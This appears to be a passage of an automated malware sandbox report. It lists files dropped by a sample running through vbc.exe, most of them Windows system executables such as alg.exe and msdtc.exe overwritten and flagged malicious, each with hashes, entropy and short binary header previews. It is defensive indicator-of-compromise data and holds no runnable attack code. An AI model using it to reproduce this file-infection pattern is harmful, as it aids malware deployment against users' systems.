                                                                                                                                                                    C:\Windows\SysWOW64\perfhost.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1150976
                                                                                                                                                                    Entropy (8bit):5.038933839637317
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:rIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:3A2A9E48FBD06CF338FA403E33134177
                                                                                                                                                                    SHA1:942DEDBCD73E11B5E08C7361C9191783D7498346
                                                                                                                                                                    SHA-256:9D4FE4951FB85EE77B26E1F68B0D5191E0BB1EA653124681419F425FB38FB104
                                                                                                                                                                    SHA-512:4FA5CDCF5173E30EC43BF11B379DE535218612597AEF547200A07F3EBEBDBA4D5ACC01FCEEFB5D55E761B6326BA82B423FD6CE279180CF242035BCA810474DD5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................Ej........... ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\AgentService.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                    Entropy (8bit):6.97434228252868
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:ZwVFr68Vw9wn/6h8N1zidlDmg27RnWGj:ZwVFrssC/dlD527BWG
                                                                                                                                                                    MD5:E46CE79404D95E10B788E99FB6C2C36E
                                                                                                                                                                    SHA1:5FB155B8727FD3A969E415CD38138E85CC6ED556
                                                                                                                                                                    SHA-256:D8C3940515AF9EEB847ADA3E3F8DFD20AB2326187A3EE19BCB2A12727B3A2799
                                                                                                                                                                    SHA-512:541E3D9604B53A8C8507CD3BD1456C547F82B08F19077504A5D9FC2D1F8CC2D726FB28CFE952C5CA8E149A5A9704ACFA3CA945786D07BCE361CEF9CC8B06FC22
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.......................................... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\AppVClient.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1348608
                                                                                                                                                                    Entropy (8bit):7.253771868247366
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:kQW4qoNUgslKNX0Ip0MgHCpoMBOuQsqjnhMgeiCl7G0nehbGZpbD:kQW9BKNX0IPgiKMBOuMDmg27RnWGj
                                                                                                                                                                    MD5:A402C4C181FB483490A130C24E7F84A6
                                                                                                                                                                    SHA1:6B320030BBACE4116AFD9E0F6F9D5BAB18FAA850
                                                                                                                                                                    SHA-256:B32F3E4A48BD808EEE53DC043CAF4D21DDF229B194D2F93E85126ED94124694F
                                                                                                                                                                    SHA-512:7D3D996D921B52F9006490FA50D2078F1ECAC1BF4786819B3ECE1AFEC7EB61F104EFBE52DF9621B25FE584841AE275BBFA2892AECEF09AB85862B31C84BDBC68
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.....................................).... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1224192
                                                                                                                                                                    Entropy (8bit):5.163579152223823
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:d2G7AbHjkrsqjnhMgeiCl7G0nehbGZpbD:d2G7AbHjiDmg27RnWGj
                                                                                                                                                                    MD5:3A37B3D9FCF2C4F66FB6C645448A80F4
                                                                                                                                                                    SHA1:A110CCC8AA902368BB037B69FFAD10A8DE459004
                                                                                                                                                                    SHA-256:4AE75812953445C0F1054A50C699CCD35977DFE04128B53CD869A9778E960AAC
                                                                                                                                                                    SHA-512:EE2258498953EE1EEC89586C2E0E1F25D657F769F16FB88B4E086FD45636176E1DB8FDC09B95EC619ABA57086E4D1249ACE3C6753A513B2ED64AA1D5DD727089
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................a.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1242624
                                                                                                                                                                    Entropy (8bit):7.288974667711691
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:SkdpSI+K3S/GWei+qNv2uG3jsqjnhMgeiCl7G0nehbGZpbD:S6SIGGWei2uG3nDmg27RnWGj
                                                                                                                                                                    MD5:B184A2D21BE1424241C0CC6F3EE4C667
                                                                                                                                                                    SHA1:F3E1CDB6D6A378991EB9CE83F5485756C4C683D8
                                                                                                                                                                    SHA-256:A4DDD6434168052FB502E71F406596A82BEB3D201E2F1D0923F7E23D66ADB0A6
                                                                                                                                                                    SHA-512:26C774B51C4F4AC5D86B8502B16CAFA38225BF89F158A1EF176EDBF46F03069DCA10CDF2E03FAA2ABF369AA14ECDC03636CAE052A113771DFE56C702ADCE37E9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......b..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\Locator.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1141248
                                                                                                                                                                    Entropy (8bit):5.017543260360941
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:tsXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tssqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:E970472BE732DDA93E40BA89E643BD45
                                                                                                                                                                    SHA1:37BE17EDCC1A249F7A021AB932315633315A88DC
                                                                                                                                                                    SHA-256:77111BA31141F997A201E20A3D351381743D0FBBB21FB227816876140194B321
                                                                                                                                                                    SHA-512:FA23628F1023C27379E86427B363A711DDF155BD725842BE2836A007CFDB64E3B62E90559EEE6DCDB79B9017445A348ED17EC766954297242C7B5DC53AA1FF26
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.....................................m.... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\MsDtc\Trace\dtctrace.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                    Entropy (8bit):0.32210892747388087
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:gLWjt8ta/k/uMclF6vMclFq5zrwJ1z8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+Gerr:HZ80kqF69Fq5zrwM6CzE5Z2+fqjFf
                                                                                                                                                                    MD5:22BA9B7AA7AA6436BB60EA342C438F6A
                                                                                                                                                                    SHA1:8AD00DB3262164A513822F360D2AAC98F3D4BA17
                                                                                                                                                                    SHA-256:EA600441EB2D7C252DC2250D30DD01462EAB3867FF034B15D961AE7DF9B3E243
                                                                                                                                                                    SHA-512:D40DB53BADED95EFEF922F61D0EDD98457771EC195F8E96E43DC763A7A1DAEA92E151AB5DB709512042689265A8E32F712300D6676F5CD525AB446753D556C6C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.@..X...X.......................................X...!....................................3.T.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`...........+.Z..A..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P..........3.T............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\OpenSSH\ssh-agent.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1511424
                                                                                                                                                                    Entropy (8bit):5.222923084007445
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:4ObHA4LWOsvAYFTbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:VjL3UTbsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:D09CFE9983E805B17E25ED1928A06826
                                                                                                                                                                    SHA1:0930569603B3A793EEB28805D9E17428E9A822F9
                                                                                                                                                                    SHA-256:2B0F27CE6F63C142E61C9B503F255B325231B8F9544132376DC9F59DAE752332
                                                                                                                                                                    SHA-512:FC037DB2E373B2AA0CF75FD6FC595AB071715056773943EEFC95F9171AA06E911F7407FEA3F853E671F56B0585133D375D0136BC65C11D2CB6D119BEFDE35C97
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D|.%...%...%...C...%...C...%...C..{%..*...%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@....................................Y`.... ......................................................... ..x.......T*...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1235968
                                                                                                                                                                    Entropy (8bit):5.182221474612602
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:npFtQOPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:yOPsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:4C2FEBAD6B92DDA4F72130648DB37727
                                                                                                                                                                    SHA1:16AB41FD96DE34B40BB860192C540AA57A4C5BDF
                                                                                                                                                                    SHA-256:E7E1B8495A5CF1C278AF9D6F788DEF1389C3782A533DF71A3DA1C5C4833A3DE9
                                                                                                                                                                    SHA-512:09DD13AFFADCCE72DA92A27A98157EF4892E6C070E96E7DD94DA6ABCA5F25A9A882D943B55FAD6162FC5360E84AF8F2A277BCB24A2F054C9632F029558983D52
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@.....................................8.... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\SearchIndexer.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                    Entropy (8bit):7.1024001569324495
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:w3frCoQItLsiLPLe24CxruW4bIhllbsqjnhMgeiCl7G0nehbGZpbD:w3fzsIPLkCNuVbIhDPDmg27RnWGj
                                                                                                                                                                    MD5:CDA6931510F865D0FFDAD4D8F3792A91
                                                                                                                                                                    SHA1:01BBEDB273146A1BC71B1FBA13F51832F3595E22
                                                                                                                                                                    SHA-256:8208403A7F5F52ABC18AE789FBB373AF2907DCCA22A52A828E0D4F965B338369
                                                                                                                                                                    SHA-512:891E460228F4535F3749DD47BB9CCC18F43EC3EAFCE7B86698CE5311EA7EB195AEBBEB4EC4A867DB9B362BB5124826C8E74A1A536E528CD0EC6A163691FE26B7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.......................................... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\SensorDataService.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1846784
                                                                                                                                                                    Entropy (8bit):6.939467102431726
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:9W6BApg2YuyuNDYTabvcRvNYf8km1+sqjnhMgeiCl7G0nehbGZpbD:9F2YuHNETovcvNYf8kmEDmg27RnWGj
                                                                                                                                                                    MD5:02C2C736D5DC9AC9088C92AFC077A118
                                                                                                                                                                    SHA1:8E1C6AD4CEA03D6DAD6C9382EB3492E94FA76E4A
                                                                                                                                                                    SHA-256:D04DD90DAA996DD3CBC08622C607FE1DE4D49EB562038407F638330CAD1D5B2A
                                                                                                                                                                    SHA-512:EE52AB23631FB164612D78E27C67EDC785AD078EB38601744B103CB7BA1D2AB202FCF345796BC1B65570EFD4BF52A2C1785D7C859E99835F7873AEED5FE702C1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p.......Y.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\Spectrum.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1455616
                                                                                                                                                                    Entropy (8bit):7.2389167468577975
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:2iW6ZvAKF5i/dN9Bdexj9Trk+FPsqjnhMgeiCl7G0nehbGZpbD:2YxF50b9Bdm9TxNDmg27RnWGj
                                                                                                                                                                    MD5:EA5AC5AC3ADFDE43933DEF676A6978C0
                                                                                                                                                                    SHA1:D1552930E52437D1DBB04DFFFD37EBBA70CC8810
                                                                                                                                                                    SHA-256:C9D88CD42F95A84C861045776AB2065D98F6054AFE17BC09BBE621B8B1276AF6
                                                                                                                                                                    SHA-512:86312C0F7151E8CB68897221976D8BC22E5F01E983D5158080EA7973791DE29F723F007C4B37EC94657B9D000DD1DCADA262919D42A5EEB62CA13338C00E51F9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@.......................................... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\TieringEngineService.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1455616
                                                                                                                                                                    Entropy (8bit):5.476608439640678
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:xJnJ5D3WYisqjnhMgeiCl7G0nehbGZpbD:xJnJ5DGYmDmg27RnWGj
                                                                                                                                                                    MD5:85B511CA7AB5F39352DEB0D3C0A048DC
                                                                                                                                                                    SHA1:98DE60EE9217145B77CC0F9F87C272C405CCAEB6
                                                                                                                                                                    SHA-256:68EC9682BB9D426ED6CDBCCF2BAE6FDFDCD8D3800965FF451FBFD3BAABCAEDA3
                                                                                                                                                                    SHA-512:32F3D598ABF202587EABFF7F408D82B739D22D0A4CCBE275FB773F4333CC8A3FD2330C8262B7C922ABE092A846DB2AEE10C71839295F63280E640B56269D865A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w............nP.....}.....}........Z...}.....}.....}.....}<....}.....Rich............................PE..d................."............................@.......................................... .......... ..........................................H...............p....................p..T...................h:..(...P9...............:..@... ...@....................text...|........................... ..`.rdata.......0......................@..@.data...............................@....pdata..p...........................@..@.didat..............................@....rsrc...............................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\VSSVC.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2075136
                                                                                                                                                                    Entropy (8bit):6.736592476107803
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:1PK86JYTerDjfJ2313e1mP1MdnUhDmg27RnWGj:rD527BWG
                                                                                                                                                                    MD5:4918AAD3E567A767F75F065692DB3366
                                                                                                                                                                    SHA1:D063A22F0DEB3DE5C18911BACF6355F614EFB1F8
                                                                                                                                                                    SHA-256:0278E9FA82C5F1D403AD07EE0C7D810AA5ED22F27C3123704CD2CB1994D2B2C1
                                                                                                                                                                    SHA-512:D63CCE0FB875602109796270E3C1B63063CF941FA0992B8EE61FBF305C1E7697A39C9DDBE800E375BB8E8922A81A73B5AF4836E094246418C1C66AAD9B90748C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.e.!.6.!.6.!.6.YI6.!.6.J.7.!.6.J.7.!.6.!.6. .6.J.7.!.6.J.7.!.6.J.7.!.6.J%6.!.6.J.7.!.6Rich.!.6........PE..d...b.Xw.........."......v...f.......p.........@.............................. ....... ... .......... ..................................................@O...0..lx...................o..T............................................................................text....t.......v.................. ..`.rdata..`|.......~...z..............@..@.data...............................@....pdata..lx...0...z..................@..@.didat..P............x..............@....rsrc...@O.......P...z..............@..@.reloc..............................@...................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\alg.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1225728
                                                                                                                                                                    Entropy (8bit):5.163333520896699
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:cEP3R6WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:X6WsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:837DCB726B9BB3B6F4FEF3318B9DEEAD
                                                                                                                                                                    SHA1:184A2158CF8AA914ACD8125FB4C303D3C182F526
                                                                                                                                                                    SHA-256:5F032350E125623DBAF737A2E5000C2782E04BC0459421293C42379358A35E3A
                                                                                                                                                                    SHA-512:610470C26125A6F621D336174EBDE190D0E058F72046931966D4AC633F25B5A7A9BA86839C3B4CD1719037DC76BA43962CEA9C3A1E8CAA54D8070E8D577EF135
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................#$.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Windows\System32\config\systemprofile\AppData\Roaming\f1a1dcf99c90d829.bin

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                    Entropy (8bit):7.984932009598044
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:ZeUsQt2OOB3j9XAKKf+gHSC04RSjNOMj0n:Zts0VOj2KRC0OSROMM
                                                                                                                                                                    MD5:F91D139C293E15212882301142D90CE4
                                                                                                                                                                    SHA1:90838690EEF5AC6816347C6DF17389013EB5B4BE
                                                                                                                                                                    SHA-256:B415ED0CDD238ADD5FD2A503BD327347019131D680EAC52029E16E7EE9C6F5B4
                                                                                                                                                                    SHA-512:B29AA028B5852F381F0FBE0508644F40B309171DCF56154E8BE8BD5AFE32F08C668D931E3426D349F9751DB9A86A5C890025239FF3CD6412EE19ED576E5F86C8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.|..5..v..M.=60....k...!>...B)MG.4v.~MJ5..}.\.x...a.f.....'.).3."......'(^o.[..R.s...f...>..E.*c......h.gAS....}......../x...N..>[A.V...4;...H.*.w|.;/.<.'....{Q..J^e.z:..ZuI..j..QX...>..b..t.d......+........s..t...k..n..r!...A#..P.|P....D.."..9....MSv&nA.f....H~3........l9.m.4C.W.U9bRxg..Ek..{.tt.....S.].0}..S6.<...L=..)......*w.....oq..=cQ....%p.\.=.b.L..U...t...8_........X..D...N.....sE.S.oUY..{..!...f.8......#.Y...&......8.`...<...|..N.wb..Dx.9.SJ..M.=.....3,._Y;.J...@....g..Z..gu......T......b..#..?....M..n!..PQ.'x.W<.h%.I.<P",..C..._.w<..%f...:....W.z..{...a.k....[ ..&;.........f.\.G.*7..dm.2.6...|..{...8w0..Y.{..Z.{.|.>. ,.H.D......+./.L.{.0..dVk.'..)/UB.%..|......OfS..BB.........k.../.[D...~..re5^......../..2..q...=.Rl.w...~.../..5...t.-..|.+.V../........3..d8..N...(&1.@<.......[. h.....o...#..-.K...v.....g.Dp&3..5.B2.........FILd..\......~.!./1.E.ca.......K...C{k2...8d,..ei.~..HJm..#.k...............av....i.&6i.5I...+....=.L..^..o...l.{.

                                                                                                                                                                    C:\Windows\System32\msdtc.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1278464
                                                                                                                                                                    Entropy (8bit):5.142998052553884
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:Ojky5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:OIy5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                    MD5:2AF6C23F4C869205351AA38C5DD66D6E
                                                                                                                                                                    SHA1:3120EE38C0E69C08E2BC00F8D46AFBB581FCD8E1
                                                                                                                                                                    SHA-256:D3509230E3516CF35D78EF5FBC675B83A66A3CDCBFDE68660877669E7EE23FEB
                                                                                                                                                                    SHA-512:8B8EDA55180078BC96E8F4947F3CD84A64ECD30A2BA745D7B8D6FFB31C4753758D75B1F0D982372007F7F98DDE0DA997B156A29881197747F27EA1945D19D032
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@.......................................... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................

